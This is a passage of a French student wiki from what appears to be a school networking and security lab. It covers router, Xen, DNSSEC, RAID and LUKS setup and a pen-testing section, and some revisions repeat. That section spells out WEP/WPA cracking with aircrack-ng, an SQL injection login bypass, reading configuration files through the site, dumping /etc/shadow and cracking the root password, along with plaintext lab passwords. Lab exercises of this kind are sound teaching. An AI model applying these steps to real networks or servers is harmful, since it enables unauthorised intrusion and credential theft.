Nous avons donc réussi à nous connecter en SSH au serveur, et nous avons récupéré les fichiers /etc/passwd et /etc/shadow.<br/><br />
Nous avons lancé la commande :<br />
unshadow /etc/passwd /etc/shadow | head -1 > mdp<br />
Nous avons obtenu un fichier avec le mot de passe root haché.<br />
<br />
5. Decryptage du mot de passe root avec John the Ripper<br />
<br />
Pour casser le mot de passe, nous avons utilisé John the Ripper. Nous nous sommes aidé des indications : "mot de passe présentant les mêmes caractéristiques que le mot de passe root habituel".<br/><br />
Nous avons créé un dictionnaire de mots de 4 lettres : <br />
crunch 4 4 abcdefghijklmnopqrstuvwxyz > dict<br />
<br />
Pour obtenir des mots de 8 lettres (en duplicant les mots de 4 lettres), nous avons utilisé sed : <br />
sed -i 's/\(.*\)/\1\1/'<br />
La dernière étape consistait à lancer JtR :<br />
john -w:dict mdp<br />
Après 5 minutes d'attente, le mot de passe vu cracké.<br/><br />
Avec la commande : <br />
john --show mdp<br />
On obtient le mot de passe : '''fortfort'''.<br />
<br />
=== ASR ===<br />
<br />
xl create -c PRA-07.cfg<br />
<br />
xen console PRA-07<br />
<br />
on ajoute dans /etc/network/interfaces :<br />
iface eth0 inet static<br />
address 172.26.145.107/24<br />
gateway 172.26.145.254<br />
<br />
Et on commente relatif au DHCP<br />
on édite /etc/ssh/sshd_config :<br />
PermitRootLogin yes<br />
<br />
on copie la clé publique de la zabeth dans /root/.ssh/authorized_key<br />
<br />
on install puthon3-venv sur la zabeth :<br />
apt install python3-venv<br />
<br />
on install ansible sur les zabeth :<br />
python3 -m venv ~/env-ansible<br />
. ~/env-ansible/bin/activate<br />
pip3 install -U setuptools wheel<br />
pip3 install -U ansible<br />
<br />
On édite le fichier inventory de ansible :<br />
ASR-07 ansible_ssh_host="172.26.145.107"<br />
<br />
Passons maintenant à la configuration de ansible :</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57905TP sysres IMA5 2021/2022 G72022-01-12T10:25:52Z<p>Avercaem : /* ASR */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 3600<br />
@ IN SOA (<br />
ns.anosteke.site.<br />
ns6.gandi.net.<br />
2;<br />
3600;<br />
3600;<br />
3600;<br />
3600;<br />
)<br />
<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME www<br />
<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
On ajoute à notre fichier named.conf.options les paramètres suivants : <br />
<br />
dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version<br />
dnssec-validation yes; //FOrcer le dnssec<br />
<br />
On génère ensuite nos clés, dans un fichier connus<br />
<br />
cd /etc/bind/master<br />
dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site <br />
//Kanosteke59.site.+007+15849<br />
dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site<br />
//Kanosteke59.site.+007+60636<br />
<br />
ici on crée une clé pour du SHA-1<br />
ON peut ensuite renommer les fichiers <br />
<br />
mv Kanosteke59.site.+007+60636.key Kanosteke59.site.ksk.key<br />
mv Kanosteke59.site.+007+60636.private Kanosteke59.site.ksk.private<br />
mv Kanosteke59.site.+007+15849.key Kanosteke59.site.zsk.key<br />
mv Kanosteke59.site.+007+15849.private Kanosteke59.site.zsk.private<br />
<br />
On ajoute dans la fin de définition du domaine :<br />
<br />
$TTL 3600<br />
<br />
...<br />
<br />
$INCLUDE Kanosteke59.site.zsk.key<br />
$INCLUDE Kanosteke59.site.ksk.key<br />
<br />
On signe maintenant nos fichier de définition<br />
dnssec-signzone -o anosteke59.site -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk<br />
<br />
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé<br />
zone "anosteke59.site" {<br />
type master;<br />
file "/etc/bind/master/anosteke59.site.signed";<br />
notify yes;<br />
};<br />
<br />
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
On formate la partition:<br />
<br />
mkfs.ext4 /dev/md0<br />
<br />
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
et on valide les modifications:<br />
<br />
mount -a<br />
<br />
=== Chiffrement de données ===<br />
<br />
Pour démarrer, nous formatons la clé :<br />
mkfs.ext4 /dev/sdb<br />
<br />
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :<br />
cryptsetup luksFormat /dev/sdb<br />
<br />
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte <br />
cryptsetup luksOpen /dev/sdb crypte<br />
Puis nous le formatons<br />
mkfs.ext4 /dev/mapper/crypte <br />
<br />
Nous montons ensuite la partition afin d'y ajouter un fichier test :<br />
mkdir /mnt/cryptUSB<br />
mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/<br />
<br />
Nous créons ce fichier test.txt en y inscrivant "BONJOUR MONDE !" :<br />
nano /mnt/cryptUSB/test.txt<br />
<br />
Enfin, nous démontons et fermons le volume chiffré :<br />
umount /mnt/cryptUSB<br />
cryptsetup luksClose crypte<br />
<br />
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers<br />
<br />
== Tests d’intrusion ==<br />
<br />
=== WEP ===<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44<br />
<br />
=== WPA ===<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
=== Intrusion sur un serveur d’application Web ===<br />
<br />
Dans un premier temps, nous réalisons une injection sql afin de récupérer la liste de tous les utilisateurs du site honey.plil.info. Nous choisissons comme utilisateur "' or 1=1; --"<br />
<br />
Nous nous connectons avec le compte administrateur. Dans un des fichiers, nous trouvons des allusions à PHPMyAdmin.<br />
De là, 3 menus, dont 2 sont intéressants. Dans l'onglet ''gestion des manuels'', on peut ajouter un fichier depuis le serveur.<br/><br />
Ainsi, nous avons ajouté le fichier /etc/phpmyadmin/config-db.php.<br/><br />
<br />
Depuis la page ''Recherche d'un manuel'', nous avons pû télécharger ce fichier, qui nous a indiqué le mot de passe du compte phpmyadmin : '''gencovid19'''.<br/><br />
<br />
2. PHPMyAdmin<br />
<br />
Nous avons donc ouvert l'URL http://honey.plil.info/phpmyadmin dans un navigateur, et nous nous connectons avec le compte root:gencovid19<br />
Dans PHPMyAdmin, nous trouvons un DB test avec des identifiants : rex:plainpassword <br />
<br />
3. Récupération de fichiers avec l'user rex<br />
<br />
Nous avons donc réussi à nous connecter en SSH au serveur, et nous avons récupéré les fichiers /etc/passwd et /etc/shadow.<br/><br />
Nous avons lancé la commande :<br />
unshadow /etc/passwd /etc/shadow | head -1 > mdp<br />
Nous avons obtenu un fichier avec le mot de passe root haché.<br />
<br />
5. Decryptage du mot de passe root avec John the Ripper<br />
<br />
Pour casser le mot de passe, nous avons utilisé John the Ripper. Nous nous sommes aidé des indications : "mot de passe présentant les mêmes caractéristiques que le mot de passe root habituel".<br/><br />
Nous avons créé un dictionnaire de mots de 4 lettres : <br />
crunch 4 4 abcdefghijklmnopqrstuvwxyz > dict<br />
<br />
Pour obtenir des mots de 8 lettres (en duplicant les mots de 4 lettres), nous avons utilisé sed : <br />
sed -i 's/\(.*\)/\1\1/'<br />
La dernière étape consistait à lancer JtR :<br />
john -w:dict mdp<br />
Après 5 minutes d'attente, le mot de passe vu cracké.<br/><br />
Avec la commande : <br />
john --show mdp<br />
On obtient le mot de passe : '''fortfort'''.<br />
<br />
=== ASR ===<br />
<br />
xl create -c PRA-07.cfg<br />
<br />
xen console PRA-07<br />
<br />
on ajoute dans /etc/network/interfaces :<br />
iface eth0 inet static<br />
address 172.26.145.107/24<br />
gateway 172.26.145.254<br />
<br />
Et on commente relatif au DHCP<br />
on édite /etc/ssh/sshd_config :<br />
PermitRootLogin yes<br />
<br />
on copie la clé publique de la zabeth dans /root/.ssh/authorized_key<br />
<br />
on install puthon3-venv sur la zabeth :<br />
apt install python3-venv<br />
<br />
on install ansible sur les zabeth :<br />
python3 -m venv ~/env-ansible<br />
. ~/env-ansible/bin/activate<br />
pip3 install -U setuptools wheel<br />
pip3 install -U ansible<br />
<br />
On édite le fichier inventory de ansible :<br />
ASR-07 ansible_ssh_host="172.26.145.107"</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57897TP sysres IMA5 2021/2022 G72022-01-12T10:18:32Z<p>Avercaem : /* ASR */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 3600<br />
@ IN SOA (<br />
ns.anosteke.site.<br />
ns6.gandi.net.<br />
2;<br />
3600;<br />
3600;<br />
3600;<br />
3600;<br />
)<br />
<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME www<br />
<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
On ajoute à notre fichier named.conf.options les paramètres suivants : <br />
<br />
dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version<br />
dnssec-validation yes; //FOrcer le dnssec<br />
<br />
On génère ensuite nos clés, dans un fichier connus<br />
<br />
cd /etc/bind/master<br />
dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site <br />
//Kanosteke59.site.+007+15849<br />
dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site<br />
//Kanosteke59.site.+007+60636<br />
<br />
ici on crée une clé pour du SHA-1<br />
ON peut ensuite renommer les fichiers <br />
<br />
mv Kanosteke59.site.+007+60636.key Kanosteke59.site.ksk.key<br />
mv Kanosteke59.site.+007+60636.private Kanosteke59.site.ksk.private<br />
mv Kanosteke59.site.+007+15849.key Kanosteke59.site.zsk.key<br />
mv Kanosteke59.site.+007+15849.private Kanosteke59.site.zsk.private<br />
<br />
On ajoute dans la fin de définition du domaine :<br />
<br />
$TTL 3600<br />
<br />
...<br />
<br />
$INCLUDE Kanosteke59.site.zsk.key<br />
$INCLUDE Kanosteke59.site.ksk.key<br />
<br />
On signe maintenant nos fichier de définition<br />
dnssec-signzone -o anosteke59.site -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk<br />
<br />
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé<br />
zone "anosteke59.site" {<br />
type master;<br />
file "/etc/bind/master/anosteke59.site.signed";<br />
notify yes;<br />
};<br />
<br />
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
On formate la partition:<br />
<br />
mkfs.ext4 /dev/md0<br />
<br />
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
et on valide les modifications:<br />
<br />
mount -a<br />
<br />
=== Chiffrement de données ===<br />
<br />
Pour démarrer, nous formatons la clé :<br />
mkfs.ext4 /dev/sdb<br />
<br />
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :<br />
cryptsetup luksFormat /dev/sdb<br />
<br />
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte <br />
cryptsetup luksOpen /dev/sdb crypte<br />
Puis nous le formatons<br />
mkfs.ext4 /dev/mapper/crypte <br />
<br />
Nous montons ensuite la partition afin d'y ajouter un fichier test :<br />
mkdir /mnt/cryptUSB<br />
mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/<br />
<br />
Nous créons ce fichier test.txt en y inscrivant "BONJOUR MONDE !" :<br />
nano /mnt/cryptUSB/test.txt<br />
<br />
Enfin, nous démontons et fermons le volume chiffré :<br />
umount /mnt/cryptUSB<br />
cryptsetup luksClose crypte<br />
<br />
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers<br />
<br />
== Tests d’intrusion ==<br />
<br />
=== WEP ===<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44<br />
<br />
=== WPA ===<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
=== Intrusion sur un serveur d’application Web ===<br />
<br />
